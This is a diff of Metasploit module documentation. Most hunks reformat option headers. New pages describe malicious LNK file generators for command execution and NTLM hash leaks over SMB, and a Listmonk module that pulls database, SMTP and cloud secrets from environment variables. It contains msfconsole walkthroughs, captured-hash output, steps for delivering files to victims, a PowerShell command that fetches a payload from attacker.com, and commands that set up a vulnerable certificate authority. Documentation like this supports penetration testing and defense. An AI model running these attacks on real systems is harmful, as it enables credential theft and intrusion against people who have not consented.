+- [Trend Micro Analysis](https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html)
+
+Disclosure Date: 2025-07-19.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Load the module: `use auxiliary/fileformat/windows_lnk_padding`.
+1. Optionally customize FILENAME, DESCRIPTION, ICON_PATH, or BUFFER_SIZE.
+1. Execute the module: `run`.
+1. A malicious LNK file will be generated.
+1. Deliver the LNK file to the target Windows system.
+1. Open the LNK file to trigger command execution (e.g., launching calc.exe).
+
+## Options
+
+
+### COMMAND
+
+The command to execute when the LNK is opened.
+
+Default: `C:\\Windows\\System32\\calc.exe`
+
+Example:
+```
+set COMMAND powershell.exe -c "Invoke-WebRequest -Uri http://attacker.com/payload"
+```
+
+### DESCRIPTION
+
+Optional description for the LNK file. If not set, a random sentence is generated.
+
+Example:
+```
+set DESCRIPTION Important Document
+```
+
+### ICON_PATH
+
+Optional path to an icon for the LNK file. If not set, a random system icon path is generated.
+
+Example:
+```
+set ICON_PATH %SystemRoot%\\System32\\shell32.dll
+```
+
+### BUFFER_SIZE
+
+The size of the whitespace padding buffer before the command (must be sufficient to avoid truncation).
+
+Default: 900
+
+Example:
+```
+set BUFFER_SIZE 1000
+```
+
+## Scenarios
+
+### Basic Command Execution on Windows
+
+Target: Any Windows system (e.g., Windows 10 or later).
+
+Generate an LNK that launches Calculator with custom padding:
+
+```
+msf > use auxiliary/fileformat/windows_lnk_padding
+msf auxiliary(fileformat/windows_lnk_padding) > set FILENAME calc.lnk
+FILENAME => calc.lnk
+msf auxiliary(fileformat/windows_lnk_padding) > set COMMAND C:\\Windows\\System32\\calc.exe
+COMMAND => C:\\Windows\\System32\\calc.exe
+msf auxiliary(fileformat/windows_lnk_padding) > set BUFFER_SIZE 900
+BUFFER_SIZE => 900
+msf auxiliary(fileformat/windows_lnk_padding) > set DESCRIPTION Calculator Shortcut
+DESCRIPTION => Calculator Shortcut
+msf auxiliary(fileformat/windows_lnk_padding) > set ICON_PATH %SystemRoot%\\System32\\calc.exe
+ICON_PATH => %SystemRoot%\\System32\\calc.exe
+msf auxiliary(fileformat/windows_lnk_padding) > run
+
+[*] Generating LNK file: calc.lnk
+[+] Successfully created calc.lnk
+[*] Command line buffer size: 900 bytes
+[*] Target command: C:\\Windows\\System32\\calc.exe
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+Windows systems where LNK files are processed in Explorer, particularly during right-click actions that load context menus.
+This can result in NTLM credential leaks over SMB.
+
+References:
+- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
+
+Disclosure Date: 2025-05-06.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Load the module: `use auxiliary/fileformat/right_click_lnk_leak`.
+1. Optionally customize FILENAME, DESCRIPTION, ICON_PATH, or PADDING_SIZE.
+1. Execute the module: `run`.
+1. A malicious LNK file is generated.
+1. Set up an SMB capture listener (e.g., `auxiliary/server/capture/smb`).
+1. Deliver the LNK file to the target system.
+1. Right-click the LNK file in Explorer to trigger the SMB connection.
+1. Monitor the listener for captured NTLM hashes.
+
+## Options
+
+### DESCRIPTION
+
+The description for the shortcut.
+
+Default: `Testing Purposes`
+
+Example:
+```
+set DESCRIPTION Important File
+```
+
+### ICON_PATH
+
+The path to an icon for the LNK file.
+
+Default: `e.g. abc.ico`
+
+Example:
+```
+set ICON_PATH %SystemRoot%\\System32\\shell32.dll
+```
+
+### PADDING_SIZE
+
+Size of padding in the command arguments.
+
+Default: 10
+
+Example:
+```
+set PADDING_SIZE 20
+```
+
+## Scenarios
+
+### NTLM Hash Capture on Right-Click
+
+Target: Windows system with Explorer (e.g., Windows 10 or later).
+
+Generate the LNK file:
+
+```
+msf > use auxiliary/fileformat/right_click_lnk_leak
+msf auxiliary(fileformat/right_click_lnk_leak) > set DESCRIPTION Fake Document
+DESCRIPTION => Fake Document
+msf auxiliary(fileformat/right_click_lnk_leak) > set ICON_PATH %SystemRoot%\\System32\\imageres.dll
+ICON_PATH => %SystemRoot%\\System32\\imageres.dll
+msf auxiliary(fileformat/right_click_lnk_leak) > set PADDING_SIZE 15
+PADDING_SIZE => 15
+msf auxiliary(fileformat/right_click_lnk_leak) > run
+
+[*] Creating 'context.lnk' file...
+[+] LNK file created: context.lnk
+[*] Set up a listener (e.g., auxiliary/server/capture/smb) to capture the authentication
+[*] Auxiliary module execution completed
+```
+
+Set up the capture listener on the attacker machine:
+
+```
+msf > use auxiliary/server/capture/smb
+msf auxiliary(server/capture/smb) > set SRVHOST 192.168.1.25
+SRVHOST => 192.168.1.25
+msf auxiliary(server/capture/smb) > run
+[*] Server started.
+```
+
+Deliver `context.lnk` to the target. When the victim right-clicks it, an SMB connection is attempted:
+
+```
+[*] SMB Captured - 2025-09-18 21:08:00 +0530
+NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
+USER:targetuser DOMAIN:TARGETPC OS: Windows 10 LM:
+LMHASH:Disabled
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:examplehashvalue
+NT_CLIENT_CHALLENGE:examplechallenge
+```
+
+Use cracking tools to recover credentials from the hash.
@@ -0,0 +1,88 @@
+## Vulnerable Application
+
+Windows systems using Explorer to browse directories with LNK files, where the IconEnvironmentDataBlock can force SMB authentication leaks.
+
+References:
+- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
+
+Disclosure Date: 2025-05-16.
+
+## Verification Steps
+
+1. Start msfconsole.
+1. Load the module: `use auxiliary/fileformat/iconenvironmentdatablock_lnk`.
+1. Set options like FILENAME, or others as needed.
+1. Execute the module: `run`.
+1. A malicious LNK file is generated.
+1. Place the LNK in a target directory.
+1. Browse the directory in Windows Explorer to trigger the SMB connection.
+1. Check the console for captured NTLM hashes.
+
+## Options
+
+
+### DESCRIPTION
+
+Optional description for the shortcut. If unset, a random sentence is generated.
+
+Example:
+```
+set DESCRIPTION System Update
+```
+
+### ICON_PATH
+
+Optional icon path for the LNK. If unset, a random system icon path is generated.
+
+Example:
+```
+set ICON_PATH %SystemRoot%\\System32\\shell32.dll
+```
+
+### PADDING_SIZE
+
+Size of padding in the command arguments.
+
+Default: 10
+
+Example:
+```
+set PADDING_SIZE 20
+```
+
+
+## Scenarios
+
+### NTLM Hash Capture via Integrated Server
+
+Target: Windows system with Explorer.
+
+```
+msf > use auxiliary/fileformat/iconenvironmentdatablock_lnk
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set FILENAME leak.lnk
+FILENAME => leak.lnk
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set SRVHOST 192.168.1.25
+SRVHOST => 192.168.1.25
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set DESCRIPTION Fake Shortcut
+DESCRIPTION => Fake Shortcut
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > set PADDING_SIZE 15
+PADDING_SIZE => 15
+msf auxiliary(fileformat/iconenvironmentdatablock_lnk) > run
+
+[*] Creating 'leak.lnk' file...
+[+] LNK file created: leak.lnk
+[*] Listening for hashes on 192.168.1.25:445
+[*] Auxiliary module execution completed
+```
+
+Deliver `leak.lnk` to a target folder. Browsing the folder triggers an SMB connection:
+
+```
+[*] SMB Captured - 2025-09-18 21:07:00 +0530
+NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
+USER:victim DOMAIN:VICTIMPC OS: Windows 10 LM:
+LMHASH:Disabled
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:samplehash
+NT_CLIENT_CHALLENGE:samplechallenge
+```
@@ -20,21 +20,21 @@ without providing any warning to the user. This allows an attacker the opportuni

 ## Options

-**CREATOR**
+### CREATOR

 This option allows you to customise the document author for the new document:
 ```
 set CREATOR New_User
 ```

-**FILENAME**
+### FILENAME

 This option allows you to customise the generated filename:
 ```
 set FILENAME salary.odt
 ```

-**LHOST**
+### LHOST

 This option allows you to set the IP address of the SMB Listener that the .odt document points to:

@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+Windows operating systems that process LNK files via Explorer, particularly when browsing directories containing the malicious shortcut.
+This can lead to NTLM credential leaks over SMB.
+
+References:
+- [Right-Click LNK](https://zeifan.my/Right-Click-LNK/)
+- [Exploit-DB 42382](https://www.exploit-db.com/exploits/42382)
+
+Disclosure Date: 2025-05-10 (reported to MSRC).
+
+## Verification Steps
+
+1. Start msfconsole.
+2. Load the module: `use auxiliary/fileformat/specialfolderdatablock_lnk`.
+3. Customize options as needed (e.g., set FILENAME or APPNAME).
+4. Execute the module: `run`.
+5. A malicious LNK file will be generated.
+6. If not using a custom UNCPATH, the module starts an SMB capture server automatically.
+7. Place the LNK file in a directory on the target system.
+8. Browse to the directory in Windows Explorer to trigger the SMB connection.
+9. Monitor the console for captured NTLM hashes.
+
+## Options
+
+### APPNAME
+
+Sets the display name of the application in the LNK file. If empty, a random name is generated.
+
+Example:
+```
+set APPNAME FakeApp
+```
+
+
+## Scenarios
+
+### Basic NTLM Hash Capture on Windows
+
+Target: A Windows system with Explorer (e.g., Windows 10 or later).
+
+Attacker: Use the module to generate the LNK and capture hashes locally.
+
+```
+msf > use auxiliary/fileformat/specialfolderdatablock_lnk
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > set FILENAME malicious.lnk
+FILENAME => malicious.lnk
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > set SRVHOST 192.168.1.25
+SRVHOST => 192.168.1.25
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > set APPNAME FakeApp
+APPNAME => FakeApp
+msf auxiliary(fileformat/specialfolderdatablock_lnk) > run
+
+[*] Starting SMB server on 192.168.1.25:445
+[*] Generating malicious LNK file
+[+] malicious.lnk stored at /root/.msf4/local/malicious.lnk
+[*] Listening for hashes on 192.168.1.25:445
+[*] Auxiliary module execution completed
+```
+
+Deliver the `malicious.lnk` file to the target (e.g., via email or shared drive).
+When the victim opens the containing folder in Explorer, an SMB connection is attempted:
+
+```
+[*] SMB Captured - 2025-09-18 21:03:00 +0530
+NTLMv2 Response Captured from 192.168.1.50:49180 - 192.168.1.50
+USER:targetuser DOMAIN:TARGETPC OS: Windows 10 LM:
+LMHASH:Disabled
+LM_CLIENT_CHALLENGE:Disabled
+NTHASH:examplehashvalue
+NT_CLIENT_CHALLENGE:examplechallenge
+```
@@ -28,12 +28,12 @@ http://advcloudfiles.advantech.com/web/Download/webaccess/8.1/AdvantechWebAccess

 ## Options

-**WEBACCESSUSER**
+### WEBACCESSUSER

 The username to use to log into Advantech WebAccess. By default, there is a built-in account
 ```admin``` that you could use.

-**WEBACCESSPASS**
+### WEBACCESSPASS

 The password to use to log into AdvanTech WebAccess. By default, the built-in account ```admin```
 does not have a password, which could be something you can use.
@@ -23,11 +23,11 @@ This will start a webserver running on port 9222 for all network interfaces.

 ## Options

-**FILEPATH**
+### FILEPATH

 The file path on the remote you wish to retrieve.

-**URL**
+### URL

 A URL you wish to fetch the contents of from the remote machine.

@@ -19,15 +19,15 @@ List the steps needed to make sure this thing works

 ## Options

-**RHOSTS**
+### RHOSTS

 Set the target host.

-**RPORT**
+### RPORT

 Set the target port. The default value is `8080` which is the default value used by Tapestry server.

-**TARGETED_CLASS**
+### TARGETED_CLASS

 This is not a required option and by default the value is `AppModule.class` which is also the default java class of by Tapestry server where the hmac key is set. But in case you want to target a different java class, it can be done by setting this option with another class name.

@@ -10,15 +10,15 @@ This module downloads PDF files and extracts the author's name from the document

 ## Options

-**URL**
+### URL

 The URL of a PDF to analyse.

-**URL_LIST**
+### URL_LIST

 File containing a list of PDF URLs to analyze.

-**OUTFILE**
+### OUTFILE

 File to store extracted author names.

@@ -8,23 +8,23 @@ BigFix Platform 9.2 - 9.2.16 and 9.5 - 9.5.11

 ## Options

-**SHOW_MASTHEAD**
+### SHOW_MASTHEAD

 Default: true. Read Organization name from `/masthead/masthead.axfm`

-**SHOW_PACKAGES**
+### SHOW_PACKAGES

 Default true. Read Action values and packages names from `/cgi-bin/bfenterprise/BESMirrorRequest.exe`

-**SHOW_SITES**
+### SHOW_SITES

 Default true. Read Site URLs from `/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands`

-**DOWNLOAD**
+### DOWNLOAD

 Default true. Attempt to download identified packages.

-**ShowURL**
+### ShowURL

 Default false. Show full URL for the packages instead of the filename.

@@ -73,7 +73,7 @@ creds -v
 The `kerberos_enumusers` module only requires the `RHOST`, `DOMAIN` and
 `USER_FILE` options to run.

-**The DOMAIN option**
+### The DOMAIN option

 This option is used to specify the target domain. If the domain name is
 incorrect an error is returned and domain user account enumeration will fail.
@@ -84,7 +84,7 @@ An example of setting DOMAIN:
 set DOMAIN [domain name]
 ```

-**The USER_FILE option**
+### The USER_FILE option

 This option is used to specify the file containing a list of user names
 to query the Domain Controller to identify if they exist in the target domain
@@ -96,7 +96,7 @@ An example of setting USER_FILE:
 set USER_FILE [path to file]
 ```

-**The Timeout option**
+### The Timeout option

 This option is used to specify the TCP timeout i.e. the time to wait
 before a connection to the Domain Controller is established and data read.
@@ -90,6 +90,22 @@ a normal user account by analyzing the objects in LDAP.
 1. Scroll down and select the `ESC3-Template2` certificate, and select `OK`.
 1. The certificate should now be available to be issued by the CA server.

+### Setting up a ESC8 Vulnerable Host
+1. Follow instructions for creating an AD CS enabled server
+1. Select Add Roles and Features
+1. Under "Select Server Roles" expand Active Directory Certificate Services and add `Certificate Enrollment Policy Web Service`, `Certificate Enrollment Web Service`, and `Certificate Authority Web Enrollment`.
+1. For each selection, accept the default for any pop-up.
+1. Accept the default features and install.
+1. When the installation is complete, click on the warning in the Dashboard for post-deployment configuration.
+1. Under Credentials, accept the default
+1. Under Role Services, select `Certificate Authority Web Enrollment`, `Certificate Enrollment Web Service`, and `Certificate Enrollment Policy Web Service`
+1. In CA for CES, accept the defaults
+1. In Authentication Types, accept the default integrated authentication
+1. In Service account for CES, select `Use built-in application pool identity`
+1. Accept default integrated authentication for CEP
+1. Select the domain certificate in Server Certificate (the one that starts with the domain name by default) if more than one appears.
+1. Accept the remaining defaults.
+
 ### Setting up a ESC9 Vulnerable Certificate Template
 1. Open up the run prompt and type in `certsrv`.
 1. In the window that appears you should see your list of certification authorities under `Certification Authority (Local)`.
@@ -206,25 +222,24 @@ In order to create a template vulnerable to ESC16 scenario 1, follow the first 1
 which is all the steps up to and excluding the `msPKI-Enrollment-Flag", 0x80000` powershell step which is how you set the `CT_FLAG_NO_SECURITY_EXTENSION`.
 Ensure that `StrongCertificateBindingEnforcement` is set to `0` or `1` (not `2`) by running the following command listed in `Configuring Windows to be Vulnerable to ESC9`

-### ESC16 Scenario 2
+#### ESC16 Scenario 2
 When a CA has the OID `1.3.6.1.4.1.311.25.2` added to its `policy\DisableExtensionList` and `StrongCertificateBindingEnforcement` is set to `2`, there is still a way to exploit the template.
 If the policy module's `EditFlags` has the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag set (which is essentially ESC6), then the template is vulnerable to ESC16 scenario 2.

 Ensure the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag is set by running following PowerShell command:
 ```powershell
-$EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000
-$activePolicyName = (Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\*\PolicyModules" -Name "Active").Active
-$editFlagsPath = "HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\*\PolicyModules\$activePolicyName"
-$editFlags = (Get-ItemProperty -Path $editFlagsPath -Name "EditFlags").EditFlags
+certutil -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
+```

-if ($editFlags -band $EDITF_ATTRIBUTESUBJECTALTNAME2) {
-    Write-Output "The EDITF_ATTRIBUTESUBJECTALTNAME2 flag is already enabled."
-} else {
-    # Enable the flag by setting it in the EditFlags value
-    $newEditFlags = $editFlags -bor $EDITF_ATTRIBUTESUBJECTALTNAME2
-    Set-ItemProperty -Path $editFlagsPath -Name "EditFlags" -Value $newEditFlags
-    Write-Output "The EDITF_ATTRIBUTESUBJECTALTNAME2 flag has been enabled."
-}
+Then restart the Certificate Services service:
+```powershell
+net stop certsvc
+net start certsvc
+```
+
+Then vefify the flag is set by running:
+```powershell
+certutil -getreg policy\EditFlags
 ```

 ## Module usage
@@ -240,15 +255,15 @@ if ($editFlags -band $EDITF_ATTRIBUTESUBJECTALTNAME2) {

 ## Options

-### REPORT_NONENROLLABLE
-If set to `True` then report any certificate templates that are vulnerable but which are not known to be enrollable.
-If set to `False` then skip over these certificate templates and only report on certificate templates
-that are both vulnerable and enrollable.
+### REPORT
+What templates to report (applies filtering to results).

-### REPORT_PRIVENROLLABLE
-If set to `True` then report certificate templates that are only enrollable by the Domain and Enterprise Admins groups.
-If set to `False` then skip over these certificate templates and only report on certificate templates that are
-enrollable by at least one additional user or group.
+* **all** - Report all certificate templates.
+* **published** - Report certificate templates that are published by at least one CA server.
+* **enrollable** - Same as above, but omits templates that the user does not have permissions to enroll in.
+* **vulnerable** - Report certificate templates where at least one misconfiguration is appears to be present.
+* **vulnerable-and-published** - Same as above, but omits templates that are not published by at least one CA server.
+* **vulnerable-and-enrollable** - Same as above, but omits templates that the user does not have permissions to enroll in.

 ## Scenarios

@@ -0,0 +1,178 @@
+## Vulnerable Application
+
+This module exploits insecure Sprig template functions in Listmonk versions >= v4.0.0 and < v5.0.2.
+The `env` and `expandenv` functions are enabled by default in campaign templates, allowing
+authenticated users with minimal campaign permissions to extract sensitive environment variables
+through the campaign preview functionality.
+
+Listmonk is a self-hosted newsletter and mailing list manager. Environment variables in
+Listmonk deployments often contain sensitive information such as database credentials,
+SMTP passwords, API keys, and admin credentials.
+
+### Required Privileges
+
+For this exploit to work, the authenticated user must have the following privileges:
+- `campaigns:get` - Permission to get and view campaigns belonging to permitted lists
+- `campaigns:get_all` - Permission to get and view campaigns across all lists
+
+These are minimal privileges that can be assigned to non-admin users in multi-user Listmonk
+installations, making this vulnerability particularly dangerous as it allows privilege escalation
+through environment variable disclosure.
+
+#### Docker Installation (Vulnerable Version)
+
+To install the vulnerable version, run the following command :
+
+```
+curl -LO https://github.com/knadh/listmonk/raw/master/docker-compose.yml
+sed -i 's|image: listmonk/listmonk:latest|image: listmonk/listmonk:v5.0.1|' docker-compose.yml
+docker compose up
+```
+
+#### Vulnerable Versions
+
+- Listmonk >= v4.0.0 and < v5.0.2
+
+#### Patched Versions
+
+- Listmonk >= v5.0.2
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/gather/listmonk_env_disclosure`
+3. Do: `set RHOSTS [target]`
+4. Do: `set USERNAME [username]`
+5. Do: `set PASSWORD [password]`
+6. Optional: `set ENVVAR [comma-separated environment variables]`
+7. Do: `run`
+8. You should see extracted environment variable values
+
+## Options
+
+### USERNAME
+
+The Listmonk username for authentication. This must be a valid user account with
+the required `campaigns:get` and `campaigns:get_all` permissions.
+
+### PASSWORD
+
+The Listmonk password for authentication.
+
+### ENVVAR
+
+A comma-separated list of environment variable names to extract. If not specified,
+the module will automatically attempt to extract a default list of common sensitive
+environment variables.
+
+**Default variables extracted (when ENVVAR is not set):**
+- `LISTMONK_db__host` - Database host
+- `LISTMONK_db__port` - Database port
+- `LISTMONK_db__user` - Database username
+- `LISTMONK_db__password` - Database password
+- `LISTMONK_db__database` - Database name
+- `LISTMONK_app__address` - Application address
+
+**Examples of custom variables to target:**
+- `LISTMONK_app__admin_username`, `LISTMONK_app__admin_password` - Admin credentials
+- `SMTP_HOST`, `SMTP_PORT`, `SMTP_USER`, `SMTP_PASSWORD` - Email server credentials
+- `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY` - Cloud provider credentials
+- `DATABASE_URL`, `REDIS_URL` - Connection strings
+- `SECRET_KEY`, `API_KEY` - Application secrets
+- `PATH`, `HOME`, `USER` - System environment variables
+
+### CAMPAIGN_NAME
+
+Optional campaign name to use for the temporary campaign created during extraction.
+If not specified, a random name will be generated to avoid collisions when running
+the module multiple times. The campaign is automatically deleted after extraction.
+
+## Scenarios
+
+### Running Check to Verify Target is Vulnerable
+
+```
+msf6 auxiliary(gather/listmonk_env_disclosure) > set RHOSTS 192.168.1.100
+RHOSTS => 192.168.1.100
+msf6 auxiliary(gather/listmonk_env_disclosure) > set USERNAME admin
+USERNAME => admin
+msf6 auxiliary(gather/listmonk_env_disclosure) > set PASSWORD adminadmin
+PASSWORD => adminadmin
+msf6 auxiliary(gather/listmonk_env_disclosure) > check
+
+[*] 192.168.1.100:9000 - The target appears to be vulnerable. Listmonk version 5.0.1 is vulnerable
+```
+
+### Extract Default Environment Variables
+
+Running the module without specifying ENVVAR will automatically extract the default
+list of common Listmonk environment variables:
+
+```
+msf6 > use auxiliary/gather/listmonk_env_disclosure
+msf6 auxiliary(gather/listmonk_env_disclosure) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/listmonk_env_disclosure) > set USERNAME admin
+USERNAME => admin
+msf6 auxiliary(gather/listmonk_env_disclosure) > set PASSWORD adminadmin
+PASSWORD => adminadmin
+msf6 auxiliary(gather/listmonk_env_disclosure) > run
+
+[*] Running module against 127.0.0.1
+[*] Targeting http://127.0.0.1:9000/
+[+] Login successful
+[*] Using default environment variable list (6 variables)
+[*] Executing template to extract environment variables...
+[+] Environment variable(s) extracted:
+
+LISTMONK_db__host: localhost
+LISTMONK_db__port: 5432
+LISTMONK_db__user: listmonk_user
+LISTMONK_db__password: my_secure_db_password123
+LISTMONK_db__database: listmonk
+LISTMONK_app__address: 0.0.0.0:9000
+
+[*] Auxiliary module execution completed
+```
+
+### Extract Specific Environment Variables
+
+You can target specific environment variables by providing a comma-separated list:
+
+```
+msf6 auxiliary(gather/listmonk_env_disclosure) > set ENVVAR LISTMONK_db__password,LISTMONK_app__admin_password,SMTP_PASSWORD
+ENVVAR => LISTMONK_db__password,LISTMONK_app__admin_password,SMTP_PASSWORD
+msf6 auxiliary(gather/listmonk_env_disclosure) > run
+
+[*] Running module against 127.0.0.1
+[*] Targeting http://127.0.0.1:9000/
+[+] Login successful
+[*] Targeting specific environment variables: LISTMONK_db__password, LISTMONK_app__admin_password, SMTP_PASSWORD
+[*] Executing template to extract environment variables...
+[+] Environment variable(s) extracted:
+
+LISTMONK_db__password: my_secure_db_password123
+LISTMONK_app__admin_password: admin_secret_password
+SMTP_PASSWORD: smtp_pass_2024
+
+[*] Auxiliary module execution completed
+```
+
+### Extract Single Environment Variable
+
+```
+msf6 auxiliary(gather/listmonk_env_disclosure) > set ENVVAR PATH
+ENVVAR => PATH
+msf6 auxiliary(gather/listmonk_env_disclosure) > run
+
+[*] Running module against 127.0.0.1
+[*] Targeting http://127.0.0.1:9000/
+[+] Login successful
+[*] Targeting specific environment variables: PATH
+[*] Executing template to extract environment variables...
+[+] Environment variable(s) extracted:
+
+PATH: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+
+[*] Auxiliary module execution completed
+```
@@ -33,16 +33,16 @@ resolvable.

 ## Options

-**PROTOCOL**
+### PROTOCOL

 Set this to either TCP or UDP. UDP is the default due to `bootparamd`.

-**CLIENT**
+### CLIENT

 Set this to the address of a client in the target's `bootparams` file.
 Usually this is a host within the same network range as the target.

-**XDRTimeout**
+### XDRTimeout

 Set this to the timeout in seconds for XDR decoding of the response.

@@ -24,21 +24,21 @@ If the link is down, you can find it via the Wayback Machine.

 ## Options

-**PROTOCOL**
+### PROTOCOL

 Set this to either TCP or UDP. TCP is the default due to easy discovery.

-**DOMAIN**
+### DOMAIN

 Set this to your NIS domain.

-**MAP**
+### MAP

 Set this to the NIS map you want to dump. The default is `passwd`. You
 can use the nicknames described in the module info instead of the full
 map names.

-**XDRTimeout**
+### XDRTimeout

 Set this to the timeout in seconds for XDR decoding of the response.

@@ -28,17 +28,39 @@ Office365's implementation of ActiveSync is vulnerable.

 ## Options

-  LOGFILE  =   Output file to use for verbose logging.
-  OUTPUT   =   Output file for results.
-  PASSWORD =   Password to use during enumeration. Note this must exist
-               but does not necessarily need to be valid. If it is
-               found to be valid for an account it will be reported.
-  THREADS  =   Number of concurrent requests to use during enumeration.
-  TIMEOUT  =   HTTP request timeout to use during enumeration.
-  URL      =   URL of Office365 ActiveSync service.
-  USERS    =   Input fie containing candidate usernames, one per line.
-  VERBOSE  =   Enable/Disable DEBUG logging
+### LOGFILE

+Output file to use for verbose logging.
+
+### OUTPUT
+
+Output file for results.
+
+### PASSWORD
+
+Password to use during enumeration. Note this must exist
+but does not necessarily need to be valid. If it is
+found to be valid for an account it will be reported.
+
+### THREADS
+
+Number of concurrent requests to use during enumeration.
+
+### TIMEOUT
+
+HTTP request timeout to use during enumeration.
+
+### URL
+
+URL of Office365 ActiveSync service.
+
+### USERS
+
+Input fie containing candidate usernames, one per line.
+
+### VERBOSE
+
+Enable/Disable DEBUG logging

 ## Scenarios

@@ -39,7 +39,7 @@ wvu@kharak:~$

 ## Options

-  **APIKEY**
+### APIKEY

  Valid API key for accessing Pimcore's REST API in order to perform the injection.

@@ -26,12 +26,12 @@ Manual     Dump an arbitrary file (FILE option)

 ## Options

-**FILE**
+### FILE

 Set this to the file you want to dump. The default is `/etc/passwd`.
 Valid only in manual mode.

-**PRINT**
+### PRINT

 Whether to print file contents to the screen. Valid only in manual mode.

@@ -8,22 +8,22 @@ may need to tweak them for your target.

 ## Options

-**OFFSET_START**
+### OFFSET_START

 You want to set this to a value where you can see a backtrace. Set this
 lower if you're not sure. Default is 2000.

-**OFFSET_END**
+### OFFSET_END

 Set this option to a value where you don't see a backtrace. Set this
 higher if you're not sure. Default is 5000.

-**RETRIES**
+### RETRIES

 Sometimes the attack won't be successful on the first run. This option
 controls how many times to retry the attack. Default is 10.

-**VERBOSE**
+### VERBOSE

 This will tell you how long the binary search took and how many requests
 were sent during exploitation. Default is false.
@@ -18,11 +18,11 @@

 ## Options

-  **ROUTE**
+### ROUTE

  This is a web path or "route" on the vulnerable server. Since the vulnerability lies within the PathResolver of Rails, the route should be in the server's routes.rb file. 

-  **TARGET_FILE**
+### TARGET_FILE

  This is the file to be read on the remote server. This *must* be an absolute path (eg. /etc/passwd).

@@ -16,11 +16,11 @@ In order for this module to function properly, a Shodan API key is needed. You c

 ## Options

-  **TARGET**
+### TARGET

  The remote host to request the API to scan.

-  **SHODAN_APIKEY**
+### SHODAN_APIKEY

  This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.

@@ -15,15 +15,15 @@ In order for this module to function properly, a Shodan API key is needed. You c

 ## Options

-  **RHOSTS**
+### RHOSTS

  The target machine(s) whose port information will be obtained from Shodan

-  **SHODAN_APIKEY**
+### SHODAN_APIKEY

  This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.

-  **Proxies**
+### Proxies
  A proxy chain of format type:host:port[,type:host:port][...] that will be used to establish the connection to the Shodan servers.


@@ -27,23 +27,23 @@

 ## Options

-**HttpUsername**
+### HttpUsername

 The username for Snare remote access (default: `snare`).

-**HttpPassword**
+### HttpPassword

 The password for Snare remote access (default: blank).

-**REG_DUMP_KEY**
+### REG_DUMP_KEY

 Retrieve the specified registry key and all sub-keys.

-**REG_DUMP_ALL**
+### REG_DUMP_ALL

 Retrieve the entire Windows registry.

-**TIMEOUT**
+### TIMEOUT

 Timeout in seconds for downloading each registry key/hive.

@@ -19,7 +19,7 @@ Microsoft Windows

 ## Options

-**FILENAME**
+### FILENAME
 This option allows you to customise the generated filename and filetpye that is generated.

 To generate desktop.ini configure a filename of desktop.ini
@@ -29,7 +29,7 @@ To generate a lnk file configure a filename of anyname.lnk

 Filetype generation is based on the file extension.

-**LHOST**
+### LHOST
 This option allows you to set the IP address of the SMB Listener that the document points to
 This can be changed using set LHOST 192.168.1.25

@@ -96,4 +96,4 @@ msf auxiliary(multidrop) > exploit
 [] Auxiliary module execution completed
 msf auxiliary(multidrop) > back
 
-  ```
+  ```
@@ -20,11 +20,11 @@ The following was done on Ubuntu 16.04, and is largely base on [1and1.com](https

 ## Options

-  **SERVERINFO**
+### SERVERINFO

  If set to `true`, the server info will also enumerated and set in msf's DB.  Defaults to `false`.

-  **CREATEUSER**
+### CREATEUSER

  If set to `true`, the server info will attempt to create an account in CouchDB using configured credentials (limited to CVE-2017-12635 conditions). Defaults to `false`.

@@ -21,27 +21,13 @@ It has been tested with Windows servers 2012, 2016, 2019 and 2022

 ### USER_FILE

-**Description:** Path to the file containing the list of usernames to enumerate. Each username should be on a separate line.
+Path to the file containing the list of usernames to enumerate. Each username should be on a separate line.
+Example: `set USER_FILE /path/to/usernames.txt`

-**Usage:** Provide the path to the file that contains the list of user accounts you want to test.
+### RPORT

-**Example:** `set USER_FILE /path/to/usernames.txt`
-
-2- `RHOSTS` (required)
-
-**Description:** The target IP address or range of IP addresses of the Domain Controllers.
-
-**Usage:** Specify the IP address or addresses of the Domain Controllers you are targeting.
-
-**Example:** `set RHOSTS 192.168.1.100`
-
-3- `RPORT` (optional)
-
-**Description:** The port for the MS-NRPC interface. If not specified, the module will attempt to determine the endpoint.
-
-**Usage:** If you know the port used by the MS-NRPC interface, you can specify it. Otherwise, the module will find it automatically.
-
-**Example:** `set RPORT 49664`
+Optional. The port for the MS-NRPC interface. If not specified, the module will attempt to determine the endpoint.
+If you know the port used by the MS-NRPC interface, you can specify it. Otherwise, the module will find it automatically.

 ## Scenarios

@@ -18,7 +18,7 @@ The following was done on Kali linux:

 ## Options

-**USERS_FILE**
+### USERS_FILE

 The USERS_FILE is a newline delimited list of users and defaults to `unix_users.txt` included with metasploit.

@@ -19,15 +19,15 @@ When installing, you must edit conf/beans.xml line 183 "remoteIp" to put in your

 ## Options

-  **FTPUSER**
+### FTPUSER

